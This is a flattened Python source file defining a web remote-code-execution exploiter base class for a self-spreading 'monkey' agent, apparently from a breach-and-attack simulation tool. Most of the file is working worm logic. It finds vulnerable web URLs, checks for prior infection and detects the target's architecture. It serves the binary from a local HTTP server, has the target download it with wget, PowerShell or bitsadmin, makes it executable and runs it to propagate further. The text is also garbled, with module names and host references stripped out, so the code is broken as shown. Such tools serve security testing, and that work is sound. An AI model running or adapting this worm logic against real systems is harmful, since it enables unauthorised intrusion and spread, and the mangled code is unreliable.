import logging from exploit import HostExploiter from model import * from posixpath import join import re from abc import abstractmethod from import get_target_monkey, get_monkey_depth, build_monkey_commandline, HTTPTools from import check_tcp_port, tcp_port_to_service __author__ = 'VakarisZ' LOG = logging.getLogger(__name__) # Command used to check if monkeys already exists LOOK_FOR_FILE = "ls %s" POWERSHELL_NOT_FOUND = "owershell is not recognized" # Constants used to refer to windows architectures( used in host.os['machine']) WIN_ARCH_32 = "32" WIN_ARCH_64 = "64" class WebRCE(HostExploiter): def __init__(self, host, monkey_target_paths=None): """ :param host: Host that we'll attack :param monkey_target_paths: Where to upload the monkey at the target host system. Dict in format {'linux': '/tmp/', 'win32': './monkey32.exe', 'win64':... } """ super(WebRCE, self).__init__(host) self._config = __import__('config').WormConfiguration if monkey_target_paths: self.monkey_target_paths = monkey_target_paths else: self.monkey_target_paths = {'linux': self._config.dropper_target_path_linux, 'win32': self._config.dropper_target_path_win_32, 'win64': self._config.dropper_target_path_win_64} self.HTTP = [str(port) for port in self._config.HTTP_PORTS] self.skip_exist = self._config.skip_exploit_if_file_exist self.vulnerable_urls = [] def get_exploit_config(self): """ Method that creates a dictionary of configuration values for exploit :return: configuration dict """ exploit_config = dict() # dropper: If true monkey will use dropper parameter that will detach monkey's process and try to copy # it's file to the default destination path. exploit_config['dropper'] = False # upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,'windows': WIN_CMD} # Command must have "monkey_path" and "http_path" format parameters. If None defaults will be used. exploit_config['upload_commands'] = None # url_extensions: What subdirectories to scan ([/extension]). Eg. ["home", "index.php"] exploit_config['url_extensions'] = None # stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable. exploit_config['stop_checking_urls'] = False # blind_exploit: If true we won't check if file exist and won't try to get the architecture of target. exploit_config['blind_exploit'] = False return exploit_config def exploit_host(self): """ Method that contains default exploitation workflow :return: True if exploited, False otherwise """ # We get exploit configuration exploit_config = self.get_exploit_config() # Get open ports ports = self.get_ports_w(self.HTTP, ["http"]) if not ports: return False # Get urls to try to exploit urls = self.build_potential_urls(ports, exploit_config['url_extensions']) self.add_vulnerable_urls(urls, exploit_config['stop_checking_urls']) if not self.vulnerable_urls: return False # Skip if monkey already exists and this option is given if not exploit_config['blind_exploit'] and self.skip_exist and self.check_remote_files(self.vulnerable_urls[0]):"Host %s was already infected under the current configuration, done" % return True # Check for targets architecture (if it's 32 or 64 bit) if not exploit_config['blind_exploit'] and not self.set_host_arch(self.vulnerable_urls[0]): return False # Upload the right monkey to target data = self.upload_monkey(self.vulnerable_urls[0], exploit_config['upload_commands']) if data is not False and data['response'] is False: return False # Change permissions to transform monkey into executable file if self.change_permissions(self.vulnerable_urls[0], data['path']) is False: return False # Execute remote monkey if self.execute_remote_monkey(self.vulnerable_urls[0], data['path'], exploit_config['dropper']) is False: return False return True @abstractmethod def exploit(self, url, command): """ A reference to a method which implements web exploit logic. :param url: Url to send malicious packet to. Format: [http/https]://ip:port/extension. :param command: Command which will be executed on remote host :return: RCE's output/True if successful or False if failed """ raise NotImplementedError() def get_open_service_ports(self, port_list, names): """ :param port_list: Potential ports to exploit. For example _config.HTTP_PORTS :param names: [] of service names. Example: ["http"] :return: Returns all open ports from port list that are of service names """ candidate_services = {} candidate_services.update({ service:[service] for service in if ([service] and[service]['name'] in names) }) valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in port_list if tcp_port_to_service(port) in candidate_services] return valid_ports def check_if_port_open(self, port): is_open, _ = check_tcp_port(, port) if not is_open:"Port %d is closed on %r, skipping", port, return False return True def get_command(self, path, http_path, commands): try: if 'linux' in['type']: command = commands['linux'] else: command = commands['windows'] # Format command command = command % {'monkey_path': path, 'http_path': http_path} except KeyError: LOG.error("Provided command is missing/bad for this type of host! " "Check upload_monkey function docs before using custom monkey's upload commands.") return False return command def check_if_exploitable(self, url): """ Checks if target is exploitable by interacting with url :param url: Url to exploit :return: True if exploitable and false if not """ try: resp = self.exploit(url, CHECK_COMMAND) if resp is True: return True elif resp is not False and ID_STRING in resp: return True else: return False except Exception as e: LOG.error("Host's exploitability check failed due to: %s" % e) return False def build_potential_urls(self, ports, extensions=None): """ :param ports: Array of ports. One port is described as size 2 array: [, isHTTPS?(bool)] Eg. ports: [[80, False], [443, True]] :param extensions: What subdirectories to scan.[/extension] :return: Array of url's to try and attack """ url_list = [] if extensions: extensions = [(e[1:] if '/' == e[0] else e) for e in extensions] else: extensions = [""] for port in ports: for extension in extensions: if port[1]: protocol = "https" else: protocol = "http" url_list.append(join(("%s://%s:%s" % (protocol,, port[0])), extension)) if not url_list:"No attack url's were built") return url_list def add_vulnerable_urls(self, urls, stop_checking=False): """ Gets vulnerable url(s) from url list :param urls: Potentially vulnerable urls :param stop_checking: If we want to continue checking for vulnerable url even though one is found (bool) :return: None (we append to class variable vulnerable_urls) """ for url in urls: if self.check_if_exploitable(url): self.vulnerable_urls.append(url) if stop_checking: break if not self.vulnerable_urls:"No vulnerable urls found, skipping.") # We add urls to param used in reporting self._exploit_info['vulnerable_urls'] = self.vulnerable_urls def get_host_arch(self, url): """ :param url: Url for exploiter to use :return: Machine architecture string or false. Eg. 'i686', '64', 'x86_64', ... """ if 'linux' in['type']: resp = self.exploit(url, GET_ARCH_LINUX) if resp: # Pulls architecture string arch ='(?<=Architecture:)\s+(\w+)', resp) try: arch = except AttributeError: LOG.error("Looked for linux architecture but could not find it") return False if arch: return arch else:"Could not pull machine architecture string from command's output") return False else: return False else: resp = self.exploit(url, GET_ARCH_WINDOWS) if resp: if "64-bit" in resp: return WIN_ARCH_64 else: return WIN_ARCH_32 else: return False def check_remote_monkey_file(self, url, path): command = LOOK_FOR_FILE % path resp = self.exploit(url, command) if 'No such file' in resp: return False else:"Host %s was already infected under the current configuration, done" % host) return True def check_remote_files(self, url): """ :param url: Url for exploiter to use :return: True if at least one file is found, False otherwise """ paths = [] if 'linux' in['type']: paths.append(self.monkey_target_paths['linux']) else: paths.extend([self.monkey_target_paths['win32'], self.monkey_target_paths['win64']]) for path in paths: if self.check_remote_monkey_file(url, path): return True return False # Wrapped functions: def get_ports_w(self, ports, names): """ Get ports wrapped with log :param ports: Potential ports to exploit. For example WormConfiguration.HTTP_PORTS :param names: [] of service names. Example: ["http"] :return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [, IsHTTPS?] """ ports = self.get_open_service_ports(ports, names) if not ports:"All default web ports are closed on %r, skipping", host) return False else: return ports def set_host_arch(self, url): arch = self.get_host_arch(url) if not arch: LOG.error("Couldn't get host machine's architecture") return False else:['machine'] = arch return True def run_backup_commands(self, resp, url, dest_path, http_path): """ If you need multiple commands for the same os you can override this method to add backup commands :param resp: Response from base command :param url: Vulnerable url :param dest_path: Where to upload monkey :param http_path: Where to download monkey from :return: Command's response (same response if backup command is not needed) """ if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp:"Powershell not found in host. Using bitsadmin to download.") backup_command = RDP_CMDLINE_HTTP % {'monkey_path': dest_path, 'http_path': http_path} resp = self.exploit(url, backup_command) return resp def upload_monkey(self, url, commands=None): """ :param url: Where exploiter should send it's request :param commands: Unformatted dict with one or two commands {'linux': LIN_CMD, 'windows': WIN_CMD} Command must have "monkey_path" and "http_path" format parameters. :return: {'response': response/False, 'path': monkeys_path_in_host} """"Trying to upload monkey to the host.") if not['type']: LOG.error("Unknown target's os type. Skipping.") return False paths = self.get_monkey_paths() if not paths: return False # Create server for http download and wait for it's startup. http_path, http_thread = HTTPTools.create_locked_transfer(, paths['src_path']) if not http_path: LOG.debug("Exploiter failed, http transfer creation failed.") return False"Started http server on %s", http_path) # Choose command: if not commands: commands = {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD} command = self.get_command(paths['dest_path'], http_path, commands) resp = self.exploit(url, command) resp = self.run_backup_commands(resp, url, paths['dest_path'], http_path) http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop()"Uploading process finished") return {'response': resp, 'path': paths['dest_path']} def change_permissions(self, url, path, command=None): """ Method for linux hosts. Makes monkey executable :param url: Where to send malicious packets :param path: Path to monkey on remote host :param command: Formatted command for permission change or None :return: response, False if failed and True if permission change is not needed """"Changing monkey's permissions") if 'windows' in['type']:"Permission change not required for windows") return True if not command: command = CHMOD_MONKEY % {'monkey_path': path} try: resp = self.exploit(url, command) except Exception as e: LOG.error("Something went wrong while trying to change permission: %s" % e) return False # If exploiter returns True / False if type(resp) is bool:"Permission change finished") return resp # If exploiter returns command output, we can check for execution errors if 'Operation not permitted' in resp: LOG.error("Missing permissions to make monkey executable") return False elif 'No such file or directory' in resp: LOG.error("Could not change permission because monkey was not found. Check path parameter.") return False"Permission change finished") return resp def execute_remote_monkey(self, url, path, dropper=False): """ This method executes remote monkey :param url: Where to send malicious packets :param path: Path to monkey on remote host :param dropper: Should remote monkey be executed with dropper or with monkey arg? :return: Response or False if failed """"Trying to execute remote monkey") # Get monkey command line if dropper and path: # If dropper is chosen we try to move monkey to default location default_path = self.get_default_dropper_path() if default_path is False: return False monkey_cmd = build_monkey_commandline(, get_monkey_depth() - 1, default_path) command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd} else: monkey_cmd = build_monkey_commandline(, get_monkey_depth() - 1) command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': MONKEY_ARG, 'parameters': monkey_cmd} try: resp = self.exploit(url, command) # If exploiter returns True / False if type(resp) is bool:"Execution attempt successfully finished") return resp # If exploiter returns command output, we can check for execution errors if 'is not recognized' in resp or 'command not found' in resp: LOG.error("Wrong path chosen or other process already deleted monkey") return False elif 'The system cannot execute' in resp: LOG.error("System could not execute monkey") return False except Exception as e: LOG.error("Something went wrong when trying to execute remote monkey: %s" % e) return False"Execution attempt finished") return resp def get_monkey_upload_path(self, url_to_monkey): """ Gets destination path from one of WEB_RCE predetermined paths(self.monkey_target_paths). :param url_to_monkey: Hosted monkey's url. egz : http://localserver:9999/monkey/windows-32.exe :return: Corresponding monkey path from self.monkey_target_paths """ if not url_to_monkey or ('linux' not in url_to_monkey and 'windows' not in url_to_monkey): LOG.error("Can't get destination path because source path %s is invalid.", url_to_monkey) return False try: if 'linux' in url_to_monkey: return self.monkey_target_paths['linux'] elif 'windows-32' in url_to_monkey: return self.monkey_target_paths['win32'] elif 'windows-64' in url_to_monkey: return self.monkey_target_paths['win64'] else: LOG.error("Could not figure out what type of monkey server was trying to upload, " "thus destination path can not be chosen.") return False except KeyError: LOG.error("Unknown key was found. Please use \"linux\", \"win32\" and \"win64\" keys to initialize " "custom dict of monkey's destination paths") return False def get_monkey_paths(self): """ Gets local (used by server) and destination (where to download) paths. :return: dict of source and destination paths """ src_path = get_target_monkey( if not src_path:"Can't find suitable monkey executable for host %r", host) return False # Determine which destination path to use dest_path = self.get_monkey_upload_path(src_path) if not dest_path: return False return {'src_path': src_path, 'dest_path': dest_path} def get_default_dropper_path(self): """ Gets default dropper path for the host. :return: Default monkey's destination path for corresponding host or False if failed. E.g. config.dropper_target_path_linux(/tmp/ for linux host """ if not'type') or (['type'] != 'linux' and['type'] != 'windows'): LOG.error("Target's OS was either unidentified or not supported. Aborting") return False if['type'] == 'linux': return self._config.dropper_target_path_linux if['type'] == 'windows': try: if['machine'] == WIN_ARCH_64: return self._config.dropper_target_path_win_64 except KeyError: LOG.debug("Target's machine type was not set. Using win-32 dropper path.") return self._config.dropper_target_path_win_32